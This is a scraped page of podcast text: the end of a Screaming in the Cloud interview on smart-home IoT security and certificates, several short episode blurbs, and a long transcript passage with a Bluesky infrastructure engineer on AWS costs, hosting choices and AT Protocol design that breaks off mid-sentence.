immediately.Koz: That's an amazing automation. I love Home Assistant. It's certainly more technical than I could give to my parents, for example, right now. I think things like Matter are going to bring a lot of that functionality to the easier-to-use hubs. And I think Home Assistant will get better over time as well.I think the only way to deal with these devices that are going to end-of-life and stop getting support is have them be local control only and so then it's your hub that keeps getting support and that's what talks to the internet. And so, you don't—you know, if there's a vulnerability in the TCP stack, for example, in your light switch, but your light switch only talks to the hub and isn't allowed to talk to anything else, how severe is that? I don't think it's so bad. Certainly, I wall off all of my IoT devices so that they don't talk to the rest of my network, but now you're getting a fairly complicated networking… mojo that listeners to your podcast I'm sure capable of, but many people aren't.Corey: I had something that did something very similar and then I had to remove a lot of those restrictions, try to diagnose a phantom issue that it appears was an unreported bug in the wireless AP when you use its second ethernet port as a bridge, where things would intermittently not be able to cross VLANs when passing through that. As in, the initial host key exchange for SSH would work and then it would stall and resets on both sides and it was a disaster. It was, what is going on here? And the answer was it was haunted. So, a small architecture change later, and the problem has not recurred. I need to reapply those restrictions.Koz: I mean, these are the kinds of things that just make me want to live in a shack in the woods, right? Like, I don't know how you manage something like that. Like, these are just pain points all over. I think over time, they'll get better, but until then, that shack in the woods with not even running water sounds pretty appealing.Corey: Yeah, at some level, having smart lights, for example, one of the best approaches that all the manufacturers I've seen have taken, it still works exactly as you would expect when you hit the light switch on the wall because that's something that you really need to make work or it turns out for those of us who don't live alone, we will not be allowed to smart home things anymore.Koz: Exactly. I don't have any smart bulbs in my house. They're all smart switches because I don't want to have to put tape over something and say, “Don't hit that switch.” And then watch one of my family members pull the tape off and hit the switch anyways.Corey: I have floor lamps with smart bulbs in them, but I wind up treating them all as one device. And I mean, I've taken the switch out from the root because it's, like, too many things to wind up slicing and dicing. But yeah, there's a scaling problem because right now a lot of this stuff—because Matter is not quite there all winds up using either Zigbee—which is fine; I have no problem with that it feels like it's becoming Matter quickly—or WiFi. And there is an upper bound to how many devices you want or can have on some fairly limited frequency.Koz: Yeah. I think this is still something that needs to be resolved. You know, I've got hundreds of devices in my house. Thankfully, most of them are not WiFi or Zigbee. But I think we're going to see this evolve over time and I'm excited for it.Corey: I was talking to someone where I was explaining that, well, how this stuff works. Like, “Well, how many devices could you possibly have on your home network?” And at the time it was about 70 or 80. And they just stared at me for the longest time. I mean, it used to be that I could name all the computers in my house. I can no longer do that.Koz: Sure. Well, I mean, every light switch ends up being a computer.Corey: And that's the weirdest thing is that it's, I'm used to computers, being a thing that requires maintenance and care and feeding and security patches and—yes, relevant to your work—an SSL certificate. It's like, so what does all of that fancy wizardry do? Well, when it receives a signal, it completes a circuit. The end. And it's, are really better off for some of these things? There are days we wonder.Koz: Well, my light bill, my electric bill, is definitely better off having these smart switches because nobody in my house seems to know how to turn a light switch off. And so, having the house do it itself helps quite a bit.Corey: To be very clear, I would skewer you if you worked on an AWS service that actually charged money for anything for what you just said about the complaining about light bills and optimizing light bills and the rest—Koz: [laugh].Corey: —but I've never had to optimize your service's certificate bill beca—after you've spun off the one thing that charges—because you can't cost optimize free, as it turns out, and I've yet to find a way to the one optimization possible where now you start paying customers money. I'm sure there's a way to do that somewhere but damned if I can find it.Koz: Well, if you find a way to optimize free, please let me know and I'll share it with all of our customers.Corey: [laugh]. Isn't that the truth? I really want to thank you for taking the time to speak with me today. If people want to learn more, where's the best place for them to find you?Koz: I can give you the standard AWS answer.Corey: Yeah, www.aws.com. Yeah.Koz: Well, I would have said koz@amazon.com. I'm always happy to talk about certs and PKI. I find myself less active on social media lately. You can find me, I guess, on Twitter as @seakoz and on Bluesky as [kozolchyk.com 00:38:03].Corey: And we will put links to all of that in the [show notes 00:38:06]. Thank you so much for being so generous with your time. I appreciate it.Koz: Always happy, Corey.Corey: Jonathan Kozolchyk, or Koz as we all call him, general manager for Certificate Services at AWS. I'm Cloud Economist Corey Quinn and this is Screaming in the Cloud. If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice along with an angry, insulting comment that then will fail to post because your podcast platform of choice has an expired security certificate.Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.

2023.7 brings in the biggest change to Home Assistant in 10 years. Rohan and Phil break it down along with all the other goodies For complete show notes and more information about the topics discussed in this episode, be sure to check the notes at https://hasspodcast.io/ha135/ Watch this episode on YouTube Support Rohan and Phil on Patreon This episode was made possible thanks to our sponsor Home Assistant Cloud by Nabu Casa Easily connect to Google and Amazon voice assistants for a small monthly fee that also supports the Home Assistant project. Configuration is via the User Interface so no fiddling with router settings, dynamic DNS or YAML. ----- Hosts ----- Phil Hawthorne Website Smart Home Products Twitter: @philhawthorne Buy Phil a Coffee Rohan Karamandi Website Smart Home Products Twitter: @rohank9 Buy Rohan a Coffee

DNS 191 Dave Crosland & Scott McNally TIME STAMPS BELOW

We cover our must-have self-hosted apps, reflect on the state of Self-Hosting now, and discuss what's new in Proxmox 8.

It's a call-in show now?! Someone else fell into the trap of sending in a desk to be reviewed! More talk about Windows than you would ever imagine. Finally, a little reflection on the show and a board meeting to decide if we keep going! Podcast Shout-out! 00:00:00 Hi, Robb!

Andrew spent yesterday rescuing the new TBTL website from the maws of DNS hell, with a lot of help from his new best friend. Plus, it looks like Wheel of Fortune has a new host lined up, but you'll have to listen to today's episode to find out if it's Ryan Seacrest.

Andrew spent yesterday rescuing the new TBTL website from the maws of DNS hell, with a lot of help from his new best friend. Plus, it looks like Wheel of Fortune has a new host lined up, but you'll have to listen to today's episode to find out if it's Ryan Seacrest.

Jake Gold, Infrastructure Engineer at Bluesky, joins Corey on Screaming in the Cloud to discuss his experience helping to build Bluesky and why he's so excited about it. Jake and Corey discuss the major differences when building a truly open-source social media platform, and Jake highlights his focus on reliability. Jake explains why he feels downtime can actually be a huge benefit to reliability engineers, and why how he views abstractions based on the size of the team he's working on. Corey and Jake also discuss whether cloud is truly living up to its original promise of lowered costs. About JakeJake Gold leads infrastructure at Bluesky, where the team is developing and deploying the decentralized social media protocol, ATP. Jake has previously managed infrastructure at companies such as Docker and Flipboard, and most recently, he was the founding leader of the Robot Reliability Team at Nuro, an autonomous delivery vehicle company.Links Referenced: Bluesky: https://blueskyweb.xyz/ Bluesky waitlist signup: https://bsky.app TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. In case folks have missed this, I spent an inordinate amount of time on Twitter over the last decade or so, to the point where my wife, my business partner, and a couple of friends all went in over the holidays and got me a leather-bound set of books titled The Collected Works of Corey Quinn. It turns out that I have over a million words of shitpost on Twitter. If you've also been living in a cave for the last year, you'll notice that Twitter has basically been bought and driven into the ground by the world's saddest manchild, so there's been a bit of a diaspora as far as people trying to figure out where community lives.Jake Gold is an infrastructure engineer at Bluesky—which I will continue to be mispronouncing as Blue-ski because that's the kind of person I am—which is, as best I can tell, one of the leading contenders, if not the leading contender to replace what Twitter was for me. Jake, welcome to the show.Jake: Thanks a lot, Corey. Glad to be here.Corey: So, there's a lot of different angles we can take on this. We can talk about the policy side of it, we can talk about social networks and things we learn watching people in large groups with quasi-anonymity, we can talk about all kinds of different nonsense. But I don't want to do that because I am an old-school Linux systems administrator. And I believe you came from the exact same path, given that as we were making sure that I had, you know, the right person on the show, you came into work at a company after I'd left previously. So, not only are you good at the whole Linux server thing; you also have seen exactly how good I am not at the Linux server thing.Jake: Well, I don't remember there being any problems at TrueCar, where you worked before me. But yeah, my background is doing Linux systems administration, which turned into, sort of, Linux programming. And these days, we call it, you know, site reliability engineering. But yeah, I discovered Linux in the late-90s, as a teenager and, you know, installing Slackware on 50 floppy disks and things like that. And I just fell in love with the magic of, like, being able to run a web server, you know? I got a hosting account at, you know, my local ISP, and I was like, how do they do that, right?And then I figured out how to do it. I ran Apache, and it was like, still one of my core memories of getting, you know, httpd running and being able to access it over the internet and telling my friends on IRC. And so, I've done a whole bunch of things since then, but that's still, like, the part that I love the most.Corey: The thing that continually surprises me is just what I think I'm out and we've moved into a fully modern world where oh, all I do is I write code anymore, which I didn't realize I was doing until I realized if you call YAML code, you can get away with anything. And I get dragged—myself getting dragged back in. It's the falling back to fundamentals in these weird moments of yes, yes, immutable everything, Infrastructure is code, but when the server is misbehaving and you want to log in and get your hands dirty, the skill set rears its head yet again. At least that's what I've been noticing, at least as far as I've gone down a number of interesting IoT-based projects lately. Is that something you experience or have you evolved fully and not looked back?Jake: Yeah. No, what I try to do is on my personal projects, I'll use all the latest cool, flashy things, any abstraction you want, I'll try out everything, and then what I do it at work, I kind of have, like, a one or two year, sort of, lagging adoption of technologies, like, when I've actually shaken them out in my own stuff, then I use them at work. But yeah, I think one of my favorite quotes is, like, “Programmers first learn the power of abstraction, then they learn the cost of abstraction, and then they're ready to program.” And that's how I view infrastructure, very similar thing where, you know, certain abstractions like container orchestration, or you know, things like that can be super powerful if you need them, but like, you know, that's generally very large companies with lots of teams and things like that. And if you're not that, it pays dividends to not use overly complicated, overly abstracted things. And so, that tends to be [where 00:04:22] I follow up most of the time.Corey: I'm sure someone's going to consider this to be heresy, but if I'm tasked with getting a web application up and running in short order, I'm putting it on an old-school traditional three-tier architecture where you have a database server, a web server or two, and maybe a job server that lives between them. Because is it the hotness? No. Is it going to be resume bait? Not really.But you know, it's deterministic as far as where things live. When something breaks, I know where to find it. And you can miss me with the, “Well, that's not webscale,” response because yeah, by the time I'm getting something up overnight, to this has to serve the entire internet, there's probably a number of architectural iterations I'm going to be able to go through. The question is, what am I most comfortable with and what can I get things up and running with that's tried and tested?I'm also remarkably conservative on things like databases and file systems because mistakes at that level are absolutely going to show. Now, I don't know how much you're able to talk about the Blue-ski infrastructure without getting yelled at by various folks, but how modern versus… reliable—I guess that's probably a fair axis to put it on: modernity versus reliability—where on that spectrum, does the official Blue-ski infrastructure land these days?Jake: Yeah. So, I mean, we're in a fortunate position of being an open-source company working on an open protocol, and so we feel very comfortable talking about basically everything. Yeah, and I've talked about this a bit on the app, but the basic idea we have right now is we're using AWS, we have auto-scaling groups, and those auto-scaling groups are just EC2 instances running Docker CE—the Community Edition—for the runtime and for containers. And then we have a load balancer in front and a Postgres multi-AZ instance in the back on RDS, and it is really, really simple.And, like, when I talk about the difference between, like, a reliability engineer and a normal software engineer is, software engineers tend to be very feature-focused, you know, they're adding capabilities to a system. And the goal and the mission of a reliability team is to focus on reliability, right? Like, that's the primary thing that we're worried about. So, what I find to be the best resume builder is that I can say with a lot of certainty that if you talk to any teams that I've worked on, they will say that the infrastructure I ran was very reliable, it was very secure, and it ended up being very scalable because you know, the way we solve the, sort of, integration thing is you just version your infrastructure, right? And I think this works really well.You just say, “Hey, this was the way we did it now and we're going to call that V1. And now we're going to work on V2. And what should V2 be?” And maybe that does need something more complicated. Maybe you need to bring in Kubernetes, you maybe need to bring in a super-cool reverse proxy that has all sorts of capabilities that your current one doesn't.Yeah, but by versioning it, you just—it takes away a lot of the, sort of, interpersonal issues that can happen where, like, “Hey, we're replacing Jake's infrastructure with Bob's infrastructure or whatever.” I just say it's V1, it's V2, it's V3, and then I find that solves a huge number of the problems with that sort of dynamic. But yeah, at Bluesky, like, you know, the big thing that we are focused on is federation is scaling for us because the idea is not for us to run the entire global infrastructure for AT Proto, which is the protocol that Bluesky is based on. The idea is that it's this big open thing like the web, right? Like, you know, Netscape popularized the web, but they didn't run every web server, they didn't run every search engine, right, they didn't run all the payment stuff. They just did all of the core stuff, you know, they created SSL, right, which became TLS, and they did all the things that were necessary to make the whole system large, federated, and scalable. But they didn't run it all. And that's exactly the same goal we have.Corey: The obvious counterexample is, no, but then you take basically their spiritual successor, which is Google, and they build the security, they build—they run a lot of the servers, they have the search engine, they have the payments infrastructure, and then they turn a lot of it off for fun and… I would say profit, except it's the exact opposite of that. But I digress. I do have a question for you that I love to throw at people whenever they start talking about how their infrastructure involves auto-scaling. And I found this during the pandemic in that a lot of people believed in their heart-of-hearts that they were auto-scaling, but people lie, mostly to themselves. And you would look at their daily or hourly spend of their infrastructure and their user traffic dropped off a cliff and their spend was so flat you could basically eat off of it and set a table on top of it. If you pull up Cost Explorer and look through your environment, how large are the peaks and valleys over the course of a given day or week cycle?Jake: Yeah, no, that's a really good point. I think my basic approach right now is that we're so small, we don't really need to optimize very much for cost, you know? We have this sort of base level of traffic and it's not worth a huge amount of engineering time to do a lot of dynamic scaling and things like that. The main benefit we get from auto-scaling groups is really just doing the refresh to replace all of them, right? So, we're also doing the immutable server concept, right, which was popularized by Netflix.And so, that's what we're really getting from auto-scaling groups. We're not even doing dynamic scaling, right? So, it's not keyed to some metric, you know, the number of instances that we have at the app server layer. But the cool thing is, you can do that when you're ready for it, right? The big issue is, you know, okay, you're scaling up your app instances, but is your database scaling up, right, because there's not a lot of use in having a whole bunch of app servers if the database is overloaded? And that tends to be the bottleneck for, kind of, any complicated kind of application like ours. So, right now, the bill is very flat; you could eat off, and—if it wasn't for the CDN traffic and the load balancer traffic and things like that, which are relatively minor.Corey: I just want to stop for a second and marvel at just how educated that answer was. It's, I talk to a lot of folks who are early-stage who come and ask me about their AWS bills and what sort of things should they concern themselves with, and my answer tends to surprise them, which is, “You almost certainly should not unless things are bizarre and ridiculous. You are not going to build your way to your next milestone by cutting costs or optimizing your infrastructure.” The one thing that I would make sure to do is plan for a future of success, which means having account segregation where it makes sense, having tags in place so that when, “Huh, this thing's gotten really expensive. What's driving all of that?” Can be answered without a six-week research project attached to it.But those are baseline AWS Hygiene 101. How do I optimize my bill further, usually the right answer is go build. Don't worry about the small stuff. What's always disturbing is people have that perspective and they're spending $300 million a year. But it turns out that not caring about your AWS bill was, in fact, a zero interest rate phenomenon.Jake: Yeah. So, we do all of those basic things. I think I went a little further than many people would where every single one of our—so we have different projects, right? So, we have the big graph server, which is sort of like the indexer for the whole network, and we have the PDS, which is the Personal Data Server, which is, kind of, where all of people's actual social data goes, your likes and your posts and things like that. And then we have a dev staging, sandbox, prod environment for each one of those, right? And there's more services besides. But the way we have it is those are all in completely separated VPCs with no peering whatsoever between them. They are all on distinct IP addresses, IP ranges, so that we could do VPC peering very easily across all of them.Corey: Ah, that's someone who's done data center work before with overlapping IP address ranges and swore, never again.Jake: Exactly. That is when I had been burned. I have cleaned up my mess and other people's messes. And there's nothing less fun than renumbering a large complicated network. But yeah, so once we have all these separate VPCs and so it's very easy for us to say, hey, we're going to take this whole stack from here and move it over to a different region, a different provider, you know?And the other thing is that we're doing is, we're completely cloud agnostic, right? I really like AWS, I think they are the… the market leader for a reason: they're very reliable. But we're building this large federated network, so we're going to need to place infrastructure in places where AWS doesn't exist, for example, right? So, we need the ability to take an environment and replicate it in wherever. And of course, they have very good coverage, but there are places they don't exist. And that's all made much easier by the fact that we've had a very strong separation of concerns.Corey: I always found it fun that when you had these decentralized projects that were invariably NFT or cryptocurrency-driven over the past, eh, five or six years or so, and then AWS would take a us-east-1 outage in a variety of different and exciting ways,j and all these projects would go down hard. It's, okay, you talk a lot about decentralization for having hard dependencies on one company in one data center, effectively, doing something right. And it becomes a harder problem in the fullness of time. There is the counterargument, in that when us-east-1 is having problems, most of the internet isn't working, so does your offering need to be up and running at all costs? There are some people for whom that answer is very much, yes. People will die if what we're running is not up and running. Usually, a social network is not on that list.Jake: Yeah. One of the things that is surprising, I think, often when I talk about this as a reliability engineer, is that I think people sometimes over-index on downtime, you know? They just, they think it's much bigger deal than it is. You know, I've worked on systems where there was credit card processing where you're losing a million dollars a minute or something. And like, in that case, okay, it matters a lot because you can put a real dollar figure on it, but it's amazing how a few of the bumps in the road we've already had with Bluesky have turned into, sort of, fun events, right?Like, we had a bug in our invite code system where people were getting too many invite codes and it was sort of caused a problem, but it was a super fun event. We all think back on it fondly, right? And so, outages are not fun, but they're not life and death, generally. And if you look at the traffic, usually what happens is after an outage traffic tends to go up. And a lot of the people that joined, they're just, they're talking about the fun outage that they missed because they weren't even on the network, right?So, it's like, I also like to remind people that eBay for many years used to have, like, an outage Wednesday, right? Whereas they could put a huge dollar figure on how much money they lost every Wednesday and yet eBay did quite well, right? Like, it's amazing what you can do if you relax the constraints of downtime a little bit. You can do maintenance things that would be impossible otherwise, which makes the whole thing work better the rest of the time, for example.Corey: I mean, it's 2023 and the Social Security Administration's website still has business hours. They take a nightly four to six-hour maintenance window. It's like, the last person out of the office turns off the server or something. I imagine some horrifying mainframe job that needs to wind up sweeping after itself are running some compute jobs. But yeah, for a lot of these use cases, that downtime is absolutely acceptable.I am curious as to… as you just said, you're building this out with an idea that it runs everywhere. So, you're on AWS right now because yeah, they are the market leader for a reason. If I'm building something from scratch, I'd be hard-pressed not to pick AWS for a variety of reasons. If I didn't have cloud expertise, I think I'd be more strongly inclined toward Google, but that's neither here nor there. But the problem is these large cloud providers have certain economic factors that they all treat similarly since they're competing with each other, and that causes me to believe things that aren't necessarily true.One of those is that egress bandwidth to the internet is very expensive. I've worked in data centers. I know how 95th percentile commit bandwidth billing works. It is not overwhelmingly expensive, but you can be forgiven for believing that it is looking at cloud environments. Today, Blue-ski does not support animated GIFs—however you want to mispronounce that word—they don't support embedded videos, and my immediate thought is, “Oh yeah, those things would be super expensive to wind up sharing.”I don't know that that's true. I don't get the sense that those are major cost drivers. I think it's more a matter of complexity than the rest. But how are you making sure that the large cloud provider economic models don't inherently shape your view of what to build versus what not to build?Jake: Yeah, no, I kind of knew where you're going as soon as you mentioned that because anyone who's worked in data centers knows that the bandwidth pricing is out of control. And I think one of the cool things that Cloudflare did is they stopped charging for egress bandwidth in certain scenarios, which is kind of amazing. And I think it's—the other thing that a lot of people don't realize is that, you know, these network connections tend to be fully symmetric, right? So, if it's a gigabit down, it's also a gigabit up at the same time, right? There's two gigabits that can be transferred per second.And then the other thing that I find a little bit frustrating on the public cloud is that they don't really pass on the compute performance improvements that have happened over the last few years, right? Like computers are really fast, right? So, if you look at a provider like Hetzner, they're giving you these monster machines for $128 a month or something, right? And then you go and try to buy that same thing on the public, the big cloud providers, and the equivalent is ten times that, right? And then if you add in the bandwidth, it's another multiple, depending on how much you're transferring.Corey: You can get Mac Minis on EC2 now, and you do the math out and the Mac Mini hardware is paid for in the first two or three months of spinning that thing up. And yes, there's value in AWS's engineering and being able to map IAM and EBS to it. In some use cases, yeah, it's well worth having, but not in every case. And the economics get very hard to justify for an awful lot of work cases.Jake: Yeah, I mean, to your point, though, about, like, limiting product features and things like that, like, one of the goals I have with doing infrastructure at Bluesky is to not let the infrastructure be a limiter on our product decisions. And a lot of that means that we'll put servers on Hetzner, we'll colo servers for things like that. I find that there's a really good hybrid cloud thing where you use AWS or GCP or Azure, and you use them for your most critical things, you're relatively low bandwidth things and the things that need to be the most flexible in terms of region and things like that—and security—and then for these, sort of, bulk services, pushing a lot of video content, right, or pushing a lot of images, those things, you put in a colo somewhere and you have these sort of CDN-like servers. And that kind of gives you the best of both worlds. And so, you know, that's the approach that we'll most likely take at Bluesky.Corey: I want to emphasize something you said a minute ago about CloudFlare, where when they first announced R2, their object store alternative, when it first came out, I did an analysis on this to explain to people just why this was as big as it was. Let's say you have a one-gigabyte file and it blows up and a million people download it over the course of a month. AWS will come to you with a completely straight face, give you a bill for $65,000 and expect you to pay it. The exact same pattern with R2 in front of it, at the end of the month, you will be faced with a bill for 13 cents rounded up, and you will be expected to pay it, and something like 9 to 12 cents of that initially would have just been the storage cost on S3 and the single egress fee for it. The rest is there is no egress cost tied to it.Now, is Cloudflare going to let you send petabytes to the internet and not charge you on a bandwidth basis? Probably not. But they're also going to reach out with an upsell and they're going to have a conversation with you. “Would you like to transition to our enterprise plan?” Which is a hell of a lot better than, “I got Slashdotted”—or whatever the modern version of that is—“And here's a surprise bill that's going to cost as much as a Tesla.”Jake: Yeah, I mean, I think one of the things that the cloud providers should hopefully eventually do—I hope Cloudflare pushes them in this direction—is to start—the original vision of AWS when I first started using it in 2006 or whenever launched, was—and they said this—they said they're going to lower your bill every so often, you know, as Moore's law makes their bill lower. And that kind of happened a little bit here and there, but it hasn't happened to the same degree that you know, I think all of us hoped it would. And I would love to see a cloud provider—and you know, Hetzner does this to some degree, but I'd love to see these really big cloud providers that are so great in so many ways, just pass on the savings of technology to the customer so we'll use more stuff there. I think it's a very enlightened viewpoint is to just say, “Hey, we're going to lower the costs, increase the efficiency, and then pass it on to customers, and then they will use more of our services as a result.” And I think Cloudflare is kind of leading the way in there, which I love.Corey: I do need to add something there—because otherwise we're going to get letters and I don't think we want that—where AWS reps will, of course, reach out and say that they have cut prices over a hundred times. And they're going to ignore the fact that a lot of these were a service you don't use in a region you couldn't find a map if your life depended on it now is going to be 10% less. Great. But let's look at the general case, where from C3 to C4—if you get the same size instance—it cut the price by a lot. C4 to C5, somewhat. C5 to C6 effectively is no change. And now, from C6 to C7, it is 6% more expensive like for like.And they're making noises about price performance is still better, but there are an awful lot of us who say things like, “I need ten of these servers to live over there.” That workload gets more expensive when you start treating it that way. And maybe the price performance is there, maybe it's not, but it is clear that the bill always goes down is not true.Jake: Yeah, and I think for certain kinds of organizations, it's totally fine the way that they do it. They do a pretty good job on price and performance. But for sort of more technical companies—especially—it's just you can see the gaps there, where that Hetzner is filling and that colocation is still filling. And I personally, you know, if I didn't need to do those things, I wouldn't do them, right? But the fact that you need to do them, I think, says kind of everything.Corey: Tired of wrestling with Apache Kafka's complexity and cost? Feel like you're stuck in a Kafka novel, but with more latency spikes and less existential dread by at least 10%? You're not alone.What if there was a way to 10x your streaming data performance without having to rob a bank? Enter Redpanda. It's not just another Kafka wannabe. Redpanda powers mission-critical workloads without making your AWS bill look like a phone number.And with full Kafka API compatibility, migration is smoother than a fresh jar of peanut butter. Imagine cutting as much as 50% off your AWS bills. With Redpanda, it's not a pipedream, it's reality.Visit go.redpanda.com/duckbill today. Redpanda: Because your data infrastructure shouldn't give you Kafkaesque nightmares.Corey: There are so many weird AWS billing stories that all distill down to you not knowing this one piece of trivia about how AWS works, either as a system, as a billing construct, or as something else. And there's a reason this has become my career of tracing these things down. And sometimes I'll talk to prospective clients, and they'll say, “Well, what if you don't discover any misconfigurations like that in our account?” It's, “Well, you would be the first company I've ever seen where that [laugh] was not true.” So honestly, I want to do a case study if we do.And I've never had to write that case study, just because it's the tax on not having the forcing function of building in data centers. There's always this idea that in a data center, you're going to run out of power, space, capacity, at some point and it's going to force a reckoning. The cloud has what distills down to infinite capacity; they can add it faster than you can fill it. So, at some point it's always just keep adding more things to it. There's never a let's clean out all of the cruft story. And it just accumulates and the bill continues to go up and to the right.Jake: Yeah, I mean, one of the things that they've done so well is handle the provisioning part, right, which is kind of what you're getting out there. One of the hardest things in the old days, before we all used AWS and GCP, is you'd have to sort of requisition hardware and there'd be this whole process with legal and financing and there'd be this big lag between the time you need a bunch more servers in your data center and when you actually have them, right, and that's not even counting the time takes to rack them and get them, you know, on network. The fact that basically, every developer now just gets an unlimited credit card, they can just, you know, use that's hugely empowering, and it's for the benefit of the companies they work for almost all the time. But it is an uncapped credit card. I know, they actually support controls and things like that, but in general, the way we treated it—Corey: Not as much as you would think, as it turns out. But yeah, it's—yeah, and that's a problem. Because again, if I want to spin up $65,000 an hour worth of compute right now, the fact that I can do that is massive. The fact that I could do that accidentally when I don't intend to is also massive.Jake: Yeah, it's very easy to think you're going to spend a certain amount and then oh, traffic's a lot higher, or, oh, I didn't realize when you enable that thing, it charges you an extra fee or something like that. So, it's very opaque. It's very complicated. All of these things are, you know, the result of just building more and more stuff on top of more and more stuff to support more and more use cases. Which is great, but then it does create this very sort of opaque billing problem, which I think, you know, you're helping companies solve. And I totally get why they need your help.Corey: What's interesting to me about distributed social networks is that I've been using Mastodon for a little bit and I've started to see some of the challenges around a lot of these things, just from an infrastructure and architecture perspective. Tim Bray, former Distinguished Engineer at AWS posted a blog post yesterday, and okay, well, if Tim wants to put something up there that he thinks people should read, I advise people generally read it. I have yet to find him wasting my time. And I clicked it and got a, “Server over resource limits.” It's like wow, you're very popular. You wound up getting—got effectively Slashdotted.And he said, “No, no. Whatever I post a link to Mastodon, two thousand instances all hidden at the same time.” And it's, “Oh, yeah. The hug of death. That becomes a challenge.” Not to mention the fact that, depending upon architecture and preferences that you make, running a Mastodon instance can be extraordinarily expensive in terms of storage, just because it'll, by default, attempt to cache everything that it encounters for a period of time. And that gets very heavy very quickly. Does the AT Protocol—AT Protocol? I don't know how you pronounce it officially these days—take into account the challenges of running infrastructures designed for folks who have corporate budgets behind them? Or is that really a future problem for us to worry about when the time comes?Jake: No, yeah, that's a core thing that we talked about a lot in the recent, sort of, architecture discussions. I'm going to go back quite a ways, but there were some changes made about six months ago in our thinking, and one of the big things that we wanted to get right was the ability for people to host their own PDS, which is equivalent to, like, posting a WordPress or something. It's where you post your content, it's where you post your likes, and all that kind of thing. We call it your repository or your repo. But that we wanted to make it so that people could self-host that on a, you know, four or five $6-a-month droplet on DigitalOcean or wherever and that not be a problem, not go down when they got a lot of traffic.And so, the architecture of AT Proto in general, but the Bluesky app on AT Proto is such that you really don't need a lot of resources. The data is all signed with your cryptographic keys—like, not something you have to worry about as a non-technical user—but all the data is authenticated. That's what—it's Authenticated Transfer Protocol. And because of that, it doesn't matter where you get the data, right? So, we have this idea of this big indexer that's looking at the entire network called the BGS, the Big Graph Server and you can go to the BGS and get the data that came from somebody's PDS and it's just as good as if you got it directly from the PDS. And that makes it highly cacheable, highly conducive to CDNs and things like that. So no, we intend to solve that problem entirely.Corey: I'm looking forward to seeing how that plays out because the idea of self-hosting always kind of appealed to me when I was younger, which is why when I met my wife, I had a two-bedroom apartment—because I lived in Los Angeles, not San Francisco, and could afford such a thing—and the guest bedroom was always, you know, 10 to 15 degrees warmer than the rest of the apartment because I had a bunch of quote-unquote, “Servers” there, meaning deprecated desktops that my employer had no use for and said, “It's either going to e-waste or your place if you want some.” And, okay, why not? I'll build my own cluster at home. And increasingly over time, I found that it got harder and harder to do things that I liked and that made sense. I used to have a partial rack in downtown LA where I ran my own mail server, among other things.And when I switched to Google for email solutions, I suddenly found that I was spending five bucks a month at the time, instead of the rack rental, and I was spending two hours less a week just fighting spam in a variety of different ways because that is where my technical background lives. Being able to not have to think about problems like that, and just do the fun part was great. But I worry about the centralization that that implies. I was opposed to it at the idea because I didn't want to give Google access to all of my mail. And then I checked and something like 43% of the people I was emailing were at Gmail-hosted addresses, so they already had my email anyway. What was I really doing by not engaging with them? I worry that self-hosting is going to become passe, so I love projects that do it in sane and simple ways that don't require massive amounts of startup capital to get started with.Jake: Yeah, the account portability feature of AT Proto is super, super core. You can backup all of your data to your phone—the [AT 00:28:36] doesn't do this yet, but it most likely will in the future—you can backup all of your data to your phone and then you can synchronize it all to another server. So, if for whatever reason, you're on a PDS instance and it disappears—which is a common problem in the Mastodon world—it's not really a problem. You just sync all that data to a new PDS and you're back where you were. You didn't lose any followers, you didn't lose any posts, you didn't lose any likes.And we're also making sure that this works for non-technical people. So, you know, you don't have to host your own PDS, right? That's something that technical people can self-host if they want to, non-technical people can just get a host from anywhere and it doesn't really matter where your host is. But we are absolutely trying to avoid the fate of SMTP and, you know, other protocols. The web itself, right, is sort of… it's hard to launch a search engine because the—first of all, the bar is billions of dollars a year in investment, and a lot of websites will only let us crawl them at a higher rate if you're actually coming from a Google IP, right? They're doing reverse DNS lookups, and things like that to verify that you are Google.And the problem with that is now there's sort of this centralization with a search engine that can't be fixed. With AT Proto, it's much easier to scrape all of the PDSes, right? So, if you want to crawl all the PDSes out on the AT Proto network, they're designed to be crawled from day one. It's all structured data, we're working on, sort of, how you handle rate limits and things like that still, but the idea is it's very easy to create an index of the entire network, which makes it very easy to create feed generators, search engines, or any other kind of sort of big world networking thing out there. And then without making the PDSes have to be very high power, right? So, they can do low power and still scrapeable, still crawlable.Corey: Yeah, the idea of having portability is super important. Question I've got—you know, while I'm talking to you, it's, we'll turn this into technical support hour as well because why not—I tend to always historically put my Twitter handle on conference slides. When I had the first template made, I used it as soon as it came in and there was an extra n in the @quinnypig username at the bottom. And of course, someone asked about that during Q&A.So, the answer I gave was, of course, n+1 redundancy. But great. If I were to have one domain there today and change it tomorrow, is there a redirect option in place where someone could go and find that on Blue-ski, and oh, they'll get redirected to where I am now. Or is it just one of those 404, sucks to be you moments? Because I can see validity to both.Jake: Yeah, so the way we handle it right now is if you have a, something.bsky.social name and you switch it to your own domain or something like that, we don't yet forward it from the old.bsky.social name. But that is totally feasible. It's totally possible. Like, the way that those are stored in your what's called your [DID record 00:31:16] or [DID document 00:31:17] is that there's, like, a list that currently only has one item in general, but it's a list of all of your different names, right? So, you could have different domain names, different subdomain names, and they would all point back to the same user. And so yeah, so basically, the idea is that you have these aliases and they will forward to the new one, whatever the current canonical one is.Corey: Excellent. That is something that concerns me because it feels like it's one of those one-way doors, in the same way that picking an email address was a one-way door. I know people who still pay money to their ancient crappy ISP because they have a few mails that come in once in a while that are super-important. I was fortunate enough to have jumped on the bandwagon early enough that my vanity domain is 22 years old this year. And my email address still works,which, great, every once in a while, I still get stuff to, like, variants of my name I no longer use anymore since 2005. And it's usually spam, but every once in a blue moon, it's something important, like, “Hey, I don't know if you remember me. We went to college together many years ago.” It's ho-ly crap, the world is smaller than we think.Jake: Yeah.j I mean, I love that we're using domains, I think that's one of the greatest decisions we made is… is that you own your own domain. You're not really stuck in our namespace, right? Like, one of the things with traditional social networks is you're sort of, their domain.com/yourname, right?And with the way AT Proto and Bluesky work is, you can go and get a domain name from any registrar, there's hundreds of them—you know, we'd like Namecheap, you can go there and you can grab a domain and you can point it to your account. And if you ever don't like anything, you 